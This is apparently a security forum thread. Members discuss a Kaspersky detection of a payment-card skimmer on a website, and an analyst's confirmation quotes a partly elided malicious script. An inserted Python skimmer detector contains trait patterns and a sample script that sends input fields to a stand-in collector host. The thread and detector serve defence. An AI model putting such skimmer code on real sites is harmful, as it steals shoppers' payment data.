JB007

Level 18
Verified
Hello,
KTS blocks the access to this site "francis-miot.com" because of the detection of "HEUR:Trojan-PSW.Script.Generic".
I have known this site for many years and I have never had any problem, so I think that it could be a false positive.
I checked with VT and there is 1 detection {VirusTotal}; I also checked with Virus Desk and the answer is that this URL is unknown, so I submitted the URL; I also opened a ticket with Kaspersky support.
I know that Kaspersky support is very slow, so I hope that you can help me...
 

Lobito Punky

Level 13
Verified
According to Netcraft it is catalogued as "Shopping Site Skimmer Detected". I suggest you send an email to the site administrator, whose address is as follows: contact (@) francis-miot (dot) com, telling him about this incident. They must solve the problem that makes some antivirus products like Kaspersky or the Netcraft extension mark the site as malicious.

You can search for references in Google: Shopping Site Skimmer Detected - Google Search
 

JB007

Level 18
Verified
Also I've sent it to KVirusDesk, waiting for final verdict...
Thanks @Lobito Punky and @harlan4096
I have already sent the information to "francis-miot contact" on November 14th but have had no answer until now.
 

Gandalf_The_Grey

Level 22
Verified
I visited the site without McAfee giving any alerts and I don't think I'm infected.
But you haven't ordered and paid anything yet...
According to Netcraft:
What are shopping site skimmers?
A shopping site skimmer is a malicious script that steals your payment card information when you checkout on an online store, and sends it back to a fraudster to use later. Netcraft finds and detects shopping site skimmers on the Internet and blocks them in the Extension.
There could be a malicious script running on that website.
I would wait for the report of Kaspersky Virus Desk before buying anything on that site.
 

harlan4096

Moderator
Verified
Staff member
Malware Hunter
Final verdict from Kaspersky analyst:
Hello,

This is not a false alarm. This site is infected.

Here is the malicious code:

"<script>
function b64EncodeUnicode(str) {

...
,buildData());
}
}
};"

If you are a webmaster, please remove the above code from the page. Also we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

Best regards,
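
One way a webmaster could act on the advice above, as an added example that is not part of the thread or of Kaspersky's reply: list a page's scripts and flag inline ones that both read form fields and send data out. The trait patterns, the names `audit_page` and `ScriptCollector`, the `.example` hosts and the sample page are assumptions constructed for illustration, since the real injected code is elided in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRAITS = {  # heuristic patterns assumed for illustration, not a vendor signature
    "reads_form_fields": re.compile(r"querySelectorAll\(\s*['\"]input|document\.forms"),
    "encodes_data": re.compile(r"\bbtoa\s*\(|b64Encode", re.I),
    "sends_data": re.compile(r"sendBeacon\s*\(|XMLHttpRequest|\bfetch\s*\("),
}

class ScriptCollector(HTMLParser):  # collects inline <script> bodies and external src URLs
    def __init__(self):
        super().__init__()
        self.inline, self.external, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def audit_page(html, site_host):
    """Return (flagged inline scripts with their traits, third-party script hosts)."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    flagged = []
    for index, body in enumerate(parser.inline):
        hits = sorted(name for name, rx in TRAITS.items() if rx.search(body))
        # Reading fields plus an outbound send is the skimmer shape; one trait alone is not.
        if "reads_form_fields" in hits and "sends_data" in hits:
            flagged.append((index, hits))
    return flagged, sorted({urlparse(s).hostname for s in parser.external} - {None, site_host})

SAMPLE = (  # constructed page: ordinary scripts plus one skimmer-shaped inline script
    '<script src="https://shop.example/js/shop.js"></script><script>fetch("/api/cart");</script>'
    '<script src="https://cdn.example.net/lib.js"></script>'
    '<script>function b64EncodeUnicode(s){return btoa(s);}'
    'function buildData(){return document.querySelectorAll("input");}'
    'navigator.sendBeacon("https://collector.example/c",b64EncodeUnicode(buildData()));</script>'
)
```

A flagged script is a lead for manual review, not a verdict; comparing the served page against a known-good copy of the template remains the reliable check.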
 

harlan4096

Moderator
Verified
Staff member
Malware Hunter
For malicious/phishing URLs they usually take around 2 days to finally respond... I got a 1st response confirming the detection, then I asked if it was a possible false positive and that is the final answer... and yes, this is the complete answer (only omitted the name of the analyst)...

To send my request I just used Kaspersky Virus Desk and gave my email (@gmail) to confirm the final verdict...
 

JB007

Level 18
Verified
Thanks @harlan4096
I did the same steps but with "Kaspersky Virus Desk" in French...
 

JB007

Level 18
Verified
Yes, this is the file included in the mail:
"
Thank you for your reply, sir.
I am sending it to you again as an attachment.

Kind regards

malicious script.txt (0.01Mb) "
Are you sure that the script is incomplete? If yes I can try to ask again.
NB: previously I received 2 mails from the support but the script was not visible...
 

Gandalf_The_Grey

Level 22
Verified
So malware detected and running on outdated software:
Website Malware & Security
  • Malware detected by scan (Critical Risk)
  • No injected spam detected (Low Risk)
  • No defacements detected (Low Risk)
  • No internal server errors detected (Low Risk)
  • Site is outdated (High Risk)